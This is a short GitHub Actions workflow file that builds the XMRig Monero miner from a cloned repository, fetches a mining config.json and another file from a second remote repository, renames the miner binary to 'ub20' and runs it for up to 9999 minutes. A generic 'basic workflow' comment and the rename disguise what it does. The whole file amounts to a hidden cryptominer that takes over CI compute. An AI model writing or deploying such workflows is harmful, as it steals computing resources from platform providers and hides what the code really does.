# This is a basic workflow to help you get started with Actions

name: ub20xm

on: workflow_dispatch

jobs:
  mnub20:

    runs-on: ubuntu-18.04
    timeout-minutes: 9999

    steps:
    - name: Descargar Lib comp.
      run: sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
    - name: Clonar repo comp.
      run: git clone https://github.com/romanferty/codmdf_xmr.git
    - name: make build comp.
      run: |
        cd codmdf_xmr
        mkdir build
        cd build
        cmake ..
        make
    - name: Descargar.
      run: |
        cd codmdf_xmr
        cd build
        wget https://raw.githubusercontent.com/romanferty/Ubun20_xmrg/main/Monero/config.json
        wget https://raw.githubusercontent.com/romanferty/Ubun20_xmrg/main/ub20xm
    - name: Renombrar.
      run: |
        cd codmdf_xmr
        cd build
        mv xmrig ub20
    - name:  Dar permisos.
      run: |
        cd codmdf_xmr
        cd build
        chmod u+x ub20
    - name: Ejecutar.
      run: |
        cd codmdf_xmr
        cd build
        ./ub20
